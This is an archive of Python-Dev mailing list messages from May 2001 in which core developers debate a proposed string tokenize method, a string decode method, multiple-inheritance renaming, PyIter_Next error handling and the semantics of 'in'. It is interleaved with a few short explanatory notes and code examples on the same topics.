04 May 2001 11:04:08 +0200 Subject: [Python-Dev] "".tokenize() ? Message-ID: <3AF27088.DE495210@lemburg.com> Gustavo Niemeyer submitted a patch which adds a tokenize-like method to strings and Unicode: "one, two and three".tokenize([",", "and"]) -> ["one", " two ", "three"] I like this method -- should I review the code and then check it in ? PS: Haven't gotten any response regarding the .decode() method yet... should I take this as "no objections" ?
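For comparison, the proposed method can be approximated with the standard `re` module, which is the route the replies in this thread recommend. This is only a sketch. `tokenize` here is an ordinary function, not a string method. Sorting the separators longest-first is an added assumption, so that a longer separator wins over a shorter one that is its prefix.

```python
import re

def tokenize(text, separators):
    """Split text at every occurrence of any of the separator substrings.

    Hypothetical helper approximating the proposed "".tokenize(); not a real
    str method.
    """
    # Longest separators first, so "--" is preferred over "-" at the same spot.
    ordered = sorted(separators, key=len, reverse=True)
    # re.escape() makes characters such as "." or "|" match literally.
    pattern = "|".join(map(re.escape, ordered))
    return re.split(pattern, text)

print(tokenize("one, two and three", [",", "and"]))
```

Splitting at every occurrence yields `' three'` with its leading space, unlike the example in the patch description. A separator such as `"and"` also cuts inside words like `"sandwich"`, so whole-word matching would need a different pattern.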
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 11:57:19 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 11:57:19 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff> mal wrote: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1. method bloat. not exactly something you do every day, and when you do, it's a one-liner: def tokenize(string, ignore): [word for word in re.findall("\w+", string) if not word in ignore] > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? -0. method bloat. we don't have asfloat methods on integers and asint methods on strings either... Cheers /F From mal at lemburg.com Fri May 4 12:16:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 12:16:16 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> Message-ID: <3AF28170.399C2A5@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1. method bloat. 
not exactly something you do every day, and > when you do, it's a one-liner: > > def tokenize(string, ignore): > [word for word in re.findall("\w+", string) if not word in ignore] This is not the same as what .tokenize() does: it cuts at each occurrence of a substring rather than words as in your example (although I must say that list comprehension looks cool ;-). > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > -0. method bloat. we don't have asfloat methods on integers and > asint methods on strings either... Well, we already have .encode() which interfaces to PyString_Encode(), but no Python API for getting at PyString_Decode(). This is what .decode() is for. Depending on the codecs you use, these two methods can be very useful, e.g. for "fixing" line-endings or hexifying strings. The codec concept can be used for far more applications than just converting from and to Unicode. About rich method APIs in general: I like having rich method APIs, since they make life easier (you don't have to reinvent the wheel every time you want a common job to be done). IMHO, too many methods can never hurt, but I'm probably alone with that POV. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Fri May 4 12:50:06 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 12:50:06 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com> Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff> mal wrote: > > > "one, two and three".tokenize([",", "and"]) > > > -> ["one", " two ", "three"] > > > > > > I like this method -- should I review the code and then check it in ? > > > > -1. method bloat.
not exactly something you do every day, and > > when you do, it's a one-liner: > > > > def tokenize(string, ignore): > > [word for word in re.findall("\w+", string) if not word in ignore] > > This is not the same as what .tokenize() does: it cut at each > occurrance of a substring rather than words as in your example oh, I didn't see the spaces. splitting on all substrings is even easier (but perhaps a bit more obscure, at least when written on one line): def tokenize(string, seps): return re.split("|".join(map(re.escape, seps)), string) Cheers /F From lkcl at samba-tng.org Fri May 4 13:31:29 2001 From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton) Date: Fri, 4 May 2001 13:31:29 +0200 Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn] Message-ID: <20010504133129.K26116@angua.rince.de> hi there, i thought it best to bring this to someone's attention. the forkingmixin code keeps track of its children, plus because it forks, there's no close_requests() to interfere with the operation of the child etc. etc. now, for some marginally bizarre reason, adding an extra base class - BaseServer - has, i believe (without proof, just a hunch), caused a bug in ThreadingMixIn to be more likely to occur. now, i wrote BaseServer in order to be able to overload this for a server that reads from a SQL server table and performs actions based on what it reads from there (the name of a host and the name of a python script to action on the host, from the database :) :) ... but i don't do threading. python is my first actual exposure to thread programming. does anyone have enough experience with threads to write something in less lines and less time than this message? 
all best, luke ----- Forwarded message from noreply at sourceforge.net ----- Delivered-To: lkcl at angua.rince.de Delivered-To: lkcl at samba.org To: noreply at sourceforge.net From: noreply at sourceforge.net Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn Date: Thu, 03 May 2001 16:26:12 -0700 Bugs item #417845, was updated on 2001-04-21 08:28 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470 Category: Python Library Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Guido van Rossum (gvanrossum) Summary: Python 2.1: SocketServer.ThreadingMixIn Initial Comment: SocketServer.ThreadingMixIn does not work properly since it tries to close the socket of a request two times. From gward at python.net Fri May 4 20:12:44 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:12:44 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010504141244.A1167@gerg.ca> On 03 May 2001, Paul F. Dubois said: > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): Maybe I'm being thick, but don't you get the same effect by doing this: class X (Y): _sfoo = Y.foo _sbar = Y.bar ...or would the "rename" syntax also hide the "foo" and "bar" names from X's effective namespace[1]? In that case, I guess some special syntax is needed. [1] "effective namespace" -- the union of X's class dict with all its superclass' dicts; not actually X's namespace, but the set of names you can use in X. I think. Err, whatever. Greg From gward at python.net Fri May 4 20:15:51 2001 From: gward at python.net (Greg Ward) Date: Fri, 4 May 2001 14:15:51 -0400 Subject: [Python-Dev] "".tokenize() ? 
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200 References: <3AF27088.DE495210@lemburg.com> Message-ID: <20010504141551.B1167@gerg.ca> On 04 May 2001, M.-A. Lemburg said: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? I concur with /F: -1 because you can do it easily with re.split(). Greg -- Greg Ward - Unix bigot gward at python.net http://starship.python.net/~gward/ I hope something GOOD came in the mail today so I have a REASON to live!! From guido at digicool.com Fri May 4 20:36:14 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:36:14 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT." <20010504141244.A1167@gerg.ca> References: <20010504141244.A1167@gerg.ca> Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com> > On 03 May 2001, Paul F. Dubois said: > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > > use Y's version: > > > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): [Greg Ward] > Maybe I'm being thick, but don't you get the same effect by doing this: > > class X (Y): > _sfoo = Y.foo > _sbar = Y.bar > > ...or would the "rename" syntax also hide the "foo" and "bar" names from > X's effective namespace[1]? In that case, I guess some special syntax > is needed. Paul's point is that the rename thing makes it possible to deprecate the form Y.foo, which is causing the basic ambiguity here. > [1] "effective namespace" -- the union of X's class dict with all its > superclass' dicts; not actually X's namespace, but the set of names you > can use in X. I think. Err, whatever. Probably irrelevant. 
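Greg Ward's class-body aliasing can be extended to Trent's two-base case, as in the minimal sketch below. It is written for Python 3, where `Y.foo` is a plain function. The class and method names are the thread's placeholders, not real APIs. Unlike the proposed `rename` syntax, this only adds names. Nothing is hidden, and `Y.foo` stays reachable, which is the ambiguity Guido says `rename` would let Python deprecate.

```python
class Y:
    def foo(self):
        return "Y.foo"

class Z:
    def foo(self):
        return "Z.foo"

class X(Y, Z):
    # Bind each base's foo under a private name in X's class body; this is the
    # current-Python spelling of "Y rename foo as _yfoo" / "Z ... as _zfoo".
    _yfoo = Y.foo
    _zfoo = Z.foo

    def foo(self):
        # X overrides foo but can still call both inherited versions.
        return (self._yfoo(), self._zfoo())

x = X()
print(x.foo())
```

Because the aliases are ordinary class attributes, they take part in normal method binding. That is why `self._yfoo()` receives `self` automatically.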
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 4 20:38:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:38:06 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT." <20010504141551.B1167@gerg.ca> References: <3AF27088.DE495210@lemburg.com> <20010504141551.B1167@gerg.ca> Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com> > On 04 May 2001, M.-A. Lemburg said: > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > I concur with /F: -1 because you can do it easily with re.split(). -1 also. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 20:51:26 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 14:51:26 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com> Message-ID: [MAL] > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1 here. Easily enough done via other means, and you just *know* different people will want different variants of tokenization (e.g., nobody in their right mind will want " two " coming back from that example, and, given that it does, that it doesn't also return " three" is baffling). > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? +1 from me: it's the other half of the existing .encode() method, and the current lack of symmetry is icky. From barry at digicool.com Fri May 4 20:57:09 2001 From: barry at digicool.com (Barry A. 
Warsaw) Date: Fri, 4 May 2001 14:57:09 -0400 Subject: [Python-Dev] Multiple inheritance References: <20010503131714.D21814@inetnebr.com> Message-ID: <15090.64389.746625.331215@anthem.wooz.org> >>>>> "JE" == Jeff Epler writes: >> class X (Y rename foo as _sfoo, bar as _sbar ): | Why not let us spell this as: | class X(Y): | from Y import foo as _sfoo, bar as _sbar | ... >>>>> "NS" == Neil Schemenauer writes: NS> This already has a meaning in Python. Paul's suggested syntax NS> is pretty neat, IMHO. Not if Y is a class though, right? That would currently raise an ImportError, so why not hijack it for this purpose? I think it has a natural and clear enough meaning without requiring additional keywords, or complicating the base class specification syntax. -Barry From tim.one at home.com Fri May 4 22:50:03 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 16:50:03 -0400 Subject: [Python-Dev] Change to PyIter_Next()? Message-ID: In spare moments, I've been plugging away at making various functions work nice with iterators (map, min, max, etc). Over and over this requires writing code of the form: op2 = PyIter_Next(it); if (op2 == NULL) { /* StopIteration is *implied* by a NULL return from * PyIter_Next() if PyErr_Occurred() is false. */ if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else goto Fail; } break; } This is wordy, obscure, and in my experience is needed every time I call PyIter_Next(). So I'd like to hide this in PyIter_Next instead, like so: /* Return next item. * If an error occurs, return NULL and set *error=1. * If the iteration terminated normally, return NULL and set *error=0. * Else return the next object and set *error=0. 
*/ PyObject * PyIter_Next(PyObject *iter, int *error) { PyObject *result; if (!PyIter_Check(iter)) { PyErr_Format(PyExc_TypeError, "'%.100s' object is not an iterator", iter->ob_type->tp_name); *error = 1; return NULL; } result = (*iter->ob_type->tp_iternext)(iter); *error = 0; if (result) return result; if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else *error = 1; } /* Else StopIteration is implicit, and there is no error. */ return NULL; } Then *calls* could be the simpler: op2 = PyIter_Next(it, &error); if (op2 == NULL) { if (error) goto Fail; break; } Objections? So far I'm almost the only user of PyIter_Next(); the only other use is in ceval's FOR_ITER, which goes thru a similar dance. However, I'm not clear on why FOR_ITER doesn't clear the exception if PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both true -- that sure smells like a bug (but, if so, the change above would squash it by magic). Note that I'm not proposing to change the signature of the tp_iternext slot similarly. PyIter_Next() is a (IMO appropriately) higher-level function. From guido at digicool.com Sat May 5 00:03:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 17:03:36 -0500 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400." References: Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> > In spare moments, I've been plugging away at making various functions work > nice with iterators (map, min, max, etc). For which efforts I extend my greatest thanks! > Over and over this requires writing code of the form: > [etc.] > > This is wordy, obscure, and in my experience is needed every time I call > PyIter_Next(). > > So I'd like to hide this in PyIter_Next instead, like so: > > /* Return next item. > * If an error occurs, return NULL and set *error=1. > * If the iteration terminated normally, return NULL and set *error=0.
> * Else return the next object and set *error=0. > */ > PyObject * > PyIter_Next(PyObject *iter, int *error) > { [etc.] > } > Then *calls* could be the simpler: > > op2 = PyIter_Next(it, &error); > if (op2 == NULL) { > if {error) > goto Fail; > break; > } I originally had this API for tp_iternext, and changed it to the current API because I got tired of having to declare the error variable. How about making PyIter_Next() call PyErr_Clear() when the exception is StopIteration? Then calls could be op2 = PyIter_Next(it); if (op2 == NULL) { if (PyErr_Occurred()) goto Fail; break; } This is a tad slower and arguably generates more code (assuming an extra call is slower than passing an extra argument and loading it) but doesn't require declaring the error variable. But since you're the customer, it's your choice. > Objections? So far I'm almost the only user of PyIter_Next(); the only other > use is in ceval's FOR_ITER, which goes thru a similar dance. > > However, I'm not clear on why FOR_ITER doesn't clear the exception if > PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both > true -- that sure smells like a bug (but, if so, the change above would > squash it by magic). Smells like a bug indeed. > Note that I'm not proposing to change the signature of the tp_iternext slot > similarly. PyIter_Next() is a (IMO appropriately) higher-level function. Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Fri May 4 23:18:16 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 4 May 2001 17:18:16 -0400 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> Message-ID: [Tim] >> In spare moments, I've been plugging away at ... iterators [Guido] > For which efforts I extend my greatest thanks! Yet but a pale reflection of the thanks I extend to you for implementing these guys to begin with: they're *loads* of fun! 
But not nearly as much fun as playing with Perl, so they're still prudently Pythonic . [T proposed adding a int* error arg to PyIter_Next()] [G] > How about making PyIter_Next() call PyErr_Clear() when the exception > is StopIteration? > > Then calls could be > > op2 = PyIter_Next(it); > if (op2 == NULL) { > if (PyErr_Occurred()) > goto Fail; > break; > } Perfect. I'll do that later tonight, and update the PEP to match. > This is a tad slower and arguably generates more code (assuming an > extra call is slower than passing an extra argument and loading it) > but doesn't require declaring the error variable. Well, it's two more calls (since PyErr_Occurred() also makes a call to get the thread state), but I don't really care because the client only does this in case of error or end-of-iteration (which aren't the normal cases). I was dreading finding a spare int var to pass inside FOR_ITER anyway . From paulp at ActiveState.com Sat May 5 02:03:05 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Fri, 04 May 2001 17:03:05 -0700 Subject: [Python-Dev] :: Message-ID: <3AF34339.9C553704@ActiveState.com> I'll throw out a partially formed thought in case it is useful to anybody. "::" might be useful to solve another problem I've been struggling with: how to have multiple package distributions share a namespace (xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). "::" might mean, in general, that you are walking through abstract, potentially merged namespaces and not through concrete dictionary implementations. I think that Python's using the same syntax for package namespaces and attribute accesses might seem more elegant than it is in practice. Things that "seem like" they should work do not because packages are fundamentally different than attributes: >>> from xml import dom.minidom File "", line 1 from xml import dom.minidom ^ SyntaxError: invalid syntax Why isn't this symmetric? I would like to use "." 
on either side of the import >>> import xml >>> print xml.dom Traceback (most recent call last): File "", line 1, in ? AttributeError: 'xml' module has no attribute 'dom' >>> from xml.dom import minidom >>> print xml.dom I find it a little bit weird that importing one module has the side effect of populating a package. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido at digicool.com Sat May 5 05:07:56 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 22:07:56 -0500 Subject: [Python-Dev] :: In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST." <3AF34339.9C553704@ActiveState.com> References: <3AF34339.9C553704@ActiveState.com> Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com> > I find it a little bit weird that importing one module has the side > effect of populating a package. That's just because you've seen too much Java. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sat May 5 10:13:30 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 05 May 2001 10:13:30 +0200 Subject: [Python-Dev] "".tokenize() ? References: Message-ID: <3AF3B62A.50DD4115@lemburg.com> Tim Peters wrote: > > [MAL] > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1 here. Easily enough done via other means, and you just *know* different > people will want different variants of tokenization (e.g., nobody in their > right mind will want " two " coming back from that example, and, given that > it does, that it doesn't also return " three" is baffling). Ok. I rejected the patch with a mild response to take on this by subclassing strings in Python 2.2 ;-) > > PS: Haven't gotten any response regarding the .decode() method yet... 
> > should I take this as "no objections" ? > > +1 from me: it's the other half of the existing .encode() method, and the > current lack of symmetry is icky. Right. If I hear no strong objections, I'll check in the .decode() method next week. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Sat May 5 13:45:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 06:45:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200." <3AF0662D.48671B4E@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com> > I've attached the patch. Due to a small reorganisation the > patch is a little longer -- symmetry has its price at C level > too ;-) Looks good on paper, so go ahead and check it in. Watch out for potential changes caused by Tim's iter-crusade! :-) While you're at it, why don't you check in the rot13 codec you posted -- it's good to have simple examples in the standard library. It would also be cool to have codecs for common file encodings like base64, quoted-printable, binhex, uuencode, and even hex (binascii.hexlify). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:15:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:15:52 -0500 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200." <3AF3B62A.50DD4115@lemburg.com> References: <3AF3B62A.50DD4115@lemburg.com> Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com> > Ok.
I rejected the patch with a mild response to take on this by > subclassing strings in Python 2.2 ;-) Gustavo didn't take the rejection well. He contacted me asking for a better explanation, and we got into a bit of an argument about how much I must explain my decisions, but I think he understands now. > If I hear no strong objections, I'll check in the .decode() > method next week. Yes, see my previous reply. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Sat May 5 14:24:19 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:24:19 -0500 Subject: [Python-Dev] PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST." References: Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> In a checkin message, Tim wrote: > The full story for instance objects is pretty much unexplainable, because > instance_contains() tries its own flavor of iteration-based containment > testing first, and PySequence_Contains doesn't get a chance at it unless > instance_contains() blows up. A consequence is that > some_complex_number in some_instance > dies with a TypeError unless some_instance.__class__ defines __iter__ but > does not define __getitem__. This kind of thing happens everywhere -- instances always define all slots but using the slots sometimes fails when the corresponding __foo__ doesn't exist. Decisions based on the presence or absence of a slot are therefore in general not reliable; the only exception is the decision to *call* the slot or not. The correct solution is not to catch AttributeError and pretend that the slot didn't exist (which would mask an AttributeError occurring inside the __contains__ method if there was one), but to reimplement the default behavior in the instance slot implementation.
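The fallback order described here can be observed from Python code. In current Python 3, not the 2001 implementation being patched, `x in obj` tries `__contains__` first, then iteration via `__iter__`, then the old `__getitem__` sequence protocol, comparing items with `==`. An `AttributeError` raised *inside* `__contains__` propagates to the caller and does not silently trigger the fallback. The class and function names below are made up for this sketch.

```python
class WithContains:
    def __contains__(self, item):
        return item == "magic"

class WithIter:
    def __init__(self, items):
        self.items = list(items)

    def __iter__(self):
        return iter(self.items)

class WithGetitem:
    def __init__(self, items):
        self.items = list(items)

    def __getitem__(self, index):
        # Old-style sequence protocol: indexes 0, 1, 2, ... until IndexError.
        return self.items[index]

class BuggyContains:
    def __contains__(self, item):
        # A bug inside __contains__: this attribute does not exist.
        return self.no_such_attribute

def attribute_error_escapes():
    """Return True if an AttributeError inside __contains__ reaches the caller."""
    try:
        1 in BuggyContains()
    except AttributeError:
        return True
    return False

print("magic" in WithContains())      # __contains__ is used directly
print(2 in WithIter([1, 2, 3]))       # falls back to iterating via __iter__
print(2 in WithGetitem([1, 2, 3]))    # falls back to __getitem__ indexing
print(1j in WithGetitem([1, 2, 3]))   # complex == int is just False, no TypeError
print(attribute_error_escapes())
```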
In this case, that means that PySequence_Contains() can be simplified (no need to test for AttributeError), and instance_contains() should fall back to a loop over iter(self) rather than trying to use instance_item(). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 22:40:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 16:40:11 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > This kind of thing happens everywhere -- instances always define all > slots but using the slots sometimes fails when the corresponding > __foo__ doesn't exist. Decisions based on the presence or absence of > a slot are therefore in general not reliable; the only exception is > the decision to *call* the slot or not. The correct solution is not > to catch AttributeError and pretend that the slot didn't exist (which > would mask an AttributeError occurring inside the __contains__ method > if there was one), Ya, it sucks. I was inspired by that instance_contains() itself makes dubious assumptions about what an AttributeError means when the functions *it* calls raise it . > but to reimplement the default behavior in the instance slot > implementation. The "backward compatibility" comment in instance_contains() was scary: compatibility with *what*? instance_contains() is pretty darn new. I assumed it meant there was *some* good (but unidentified) reason we had to use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if instance_item() "worked". But I haven't thought of one, except to ensure that some_complex in some_instance_with___getitem__ continues to blow up -- but that's not a good reason. So: > In this case, that means that PySequence_Contains() can be simplified > (no need to test for AttributeError), and instance_contains() should > fall back to a loop over iter(self) rather than trying to use > instance_item(). 
Will do! From guido at digicool.com Sat May 5 23:48:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 16:48:33 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400." References: Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> > [Guido] > > This kind of thing happens everywhere -- instances always define all > > slots but using the slots sometimes fails when the corresponding > > __foo__ doesn't exist. Decisions based on the presence or absence of > > a slot are therefore in general not reliable; the only exception is > > the decision to *call* the slot or not. The correct solution is not > > to catch AttributeError and pretend that the slot didn't exist (which > > would mask an AttributeError occurring inside the __contains__ method > > if there was one), [Tim] > Ya, it sucks. I was inspired by that instance_contains() itself makes > dubious assumptions about what an AttributeError means when the functions > *it* calls raise it . Actually, instance_contains checks for AttributeError only after calling instance_getattr(), whose only purpose is to return the requested attribute or raise AttributeError, so here it is safe: the __contains__ function hasn't been called yet. > > but to reimplement the default behavior in the instance slot > > implementation. > > The "backward compatibility" comment in instance_contains() was scary: > compatibility with *what*? With previous behavior of 'x in instance'. Before we had __contains__, 'x in y' *always* iterated over the items of y as a sequence, comparing them to x one at a time. The loop does that. > instance_contains() is pretty darn new. I > assumed it meant there was *some* good (but unidentified) reason we had to > use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if > instance_item() "worked". No, that was probably just an oversight -- clearly it should have used rich comparisons. 
(I guess this is a disadvantage of the approach I'm recommending here: if the default behavior changes, the reimplementation of the default behavior in the class must be changed too.) > But I haven't thought of one, except to ensure > that > > some_complex in some_instance_with___getitem__ > > continues to blow up -- but that's not a good reason. Indeed not. > So: > > > In this case, that means that PySequence_Contains() can be simplified > > (no need to test for AttributeError), and instance_contains() should > > fall back to a loop over iter(self) rather than trying to use > > instance_item(). > > Will do! Thanks! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sat May 5 23:24:58 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 5 May 2001 17:24:58 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Actually, instance_contains checks for AttributeError only after > calling instance_getattr(), whose only purpose is to return the > requested attribute or raise AttributeError, so here it is safe: the > __contains__ function hasn't been called yet. I'd say "safer", but not "safe": at that point we only know that *some* attribute didn't exist, somewhere, while attempting to look up "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ hook, like def __getattr__(self, attr): return global_resolver.resolve(self, attr) where global_resolver has lost its "resolve" attr. "except" clauses aren't more bulletproof in C than in Python <0.9 wink>. > With previous behavior of 'x in instance'. Before we had > __contains__, 'x in y' *always* iterated over the items of y as a > sequence, comparing them to x one at a time. I don't believe I ever knew that! Thanks. I erroneously assumed that the looping behavior was *introduced* when __contains__ was added. > ...
> No, that was probably just an oversight -- clearly it should have used > rich comparisons. (I guess this is a disadvantage of the approach I'm > recommending here: if the default behavior changes, the > reimplementation of the default behavior in the class must be changed > too.) I factored out the new iterator-based __contains__ logic into a new private API function, called when appropriate by both PySequence_Contains() and instance_contains(). So any future changes to what iterator-based __contains__ means will only need to be made in one place. too-easy-ly y'rs - tim From guido at digicool.com Sun May 6 00:31:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 17:31:05 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400." References: Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> > [Guido] > > Actually, instance_contains checks for AttributeError only after > > calling instance_getattr(), whose only purpose is to return the > > requested attribute or raise AttributeError, so here it is safe: the > > __contains__ function hasn't been called yet. [Tim] > I'd say "safer", but not "safe": at that point we only know that *some* > attribute didn't exist, somewhere, while attempting to look up > "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ > hook, like > > def __getattr__(self, attr): > return global_resolver.resolve(self, attr) > > where global_resolver has lost its "resolve" attr. "except" clauses aren't > more bulletproof in C than in Python <0.9 wink>. Yes, but attribute errors inside __getattr__ hooks are *always* a problem to debug, since raising AttributeError is part of its job. So this is not new. I should have said "as safe as it gets." > > With previous behavior of 'x in instance'. Before we had > > __contains__, 'x in y' *always* iterated over the items of y as a > > sequence, comparing them to x one at a time. 
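The sequence-protocol fallback Guido mentions still exists in Python 3. Suppose a class defines neither `__contains__` nor `__iter__` but does define `__getitem__`. Python then supports `in` by indexing from 0 and comparing each item until it hits `IndexError`. `OldStyleSeq` is a hypothetical name used only for this sketch.

```python
class OldStyleSeq:
    """Defines only __getitem__, as pre-__contains__ sequences did."""

    def __init__(self, *items):
        self._items = list(items)

    def __getitem__(self, index):
        # Raising IndexError past the end tells Python the sequence is exhausted.
        return self._items[index]


s = OldStyleSeq("a", "b", "c")
print("b" in s)  # True: Python calls s[0], s[1], ... comparing each to "b"
print("z" in s)  # False: the scan stops at the IndexError from s[3]
```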
